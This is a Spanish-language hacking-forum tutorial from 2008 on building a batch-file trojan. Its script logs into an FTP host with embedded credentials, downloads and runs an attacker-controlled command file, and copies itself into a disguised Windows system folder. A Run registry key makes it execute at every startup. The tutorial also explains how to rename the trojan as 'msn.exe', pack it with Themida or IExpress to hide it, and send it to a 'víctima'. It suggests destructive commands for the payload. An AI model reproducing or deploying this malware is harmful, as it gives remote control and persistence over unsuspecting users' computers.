Troyanizando en Batch |GUN$|

Troyanizando en batch

Indice:

->1.Introduccion
->2.Requisitos minimos
->3.Crear cuenta FTP
->4.Codigo para la vícitima
->5.Codigo FTP
->6.Iexpress + Themida + Cygy para Código FTP
_____________________________________________________________________

1.Introduccion

· Os voy a hacer un breve tutorial de como troyanizar en batch sin usar ningun ejecutable Wink

solo con un .txt y un .bat; ayudandonos de lo maravilloso que es FTP Wink

2.Requisitos minimos

->notepad.exe (jajaja)
->una cuenta ftp
->Vía de propagacion
->Iexpress + themida + cygy

3.Crear cuenta FTP

->Crea tu cuenta FTP
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

AQUI

4.Codigo para la vícitima

-> Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt (no vale otro nombre)

->abrimos nuestro notepad... y a nuestro gusto creamos el code con programacion batch Wink

el cual sera ejecutado en el pc de la víctima

·comandos interesantes:

-Dir
-Del
-Start
-Reg ADD
-Attrib
-Shutdown

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Más información para crear vuestro code

Cuando tengamos el code guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP

·ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez ke inicie windows Wink

NOTA: Debereis rehacer a vuestro gusto vuestro ordenes.txt i volverlo a subir a vuestro ftp para ke se ejecute en el pc de la victima cuando inicie windows Wink

5.Codigo FTP

Aqui os pongo el .bat que le tendreis que enviar a vuestra victima Wink

NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo.

Citar

@echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo username>ftp.tmp
echo pass>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp ftp.geocities.com
del /f /q ftp.tmp
rename ordenes.txt soundUni.bat
start soundUni.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y "archivo_ftp.bat" "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f"
exit

·Username: Aqui debereis colocar vuestro usuario de ftp
·Pass: Aqui deberis poner la pass de vuestro ftp
·ordenes.txt: nunca cambies el nombre de vuestro archivo ordenes.txt ya que si lo cambiais el code no podria bajar el archivo para ejecutarlo en el pc de la victima Wink

·archivo_ftp.bat:Si el archivo ke le enviareis a la victima lo compilais a .exe pues debereis cambiar el nombre a archivo_ftp.exe y si le dais un nombre menos llamativo a vuestro code pues quedaria asi:

Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir....

6.Iexpress + Themida + Cygy para Código FTP

-> En esta parte es donde debereis compilar vuestro "msn.bat" a "msn.exe", comprimirlo y enviarlo por alguna via de red Wink

->Tutorial + Descarga por Txshack Wink

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

CYGY + THEMIDA + IEXPRESS

->La explicacion a sido breve i un poco imprecisa :S lo siento.... si teneis alguna duda preguntenla por M.P o en este mismo post Wink

_____________________________________________________________________

TUTORIAL POR GUN$

FUENTE:
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

http://foro.infiernohacker.com/index.php?topic=2641.0

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Octubre 14, 2008, 09:04:02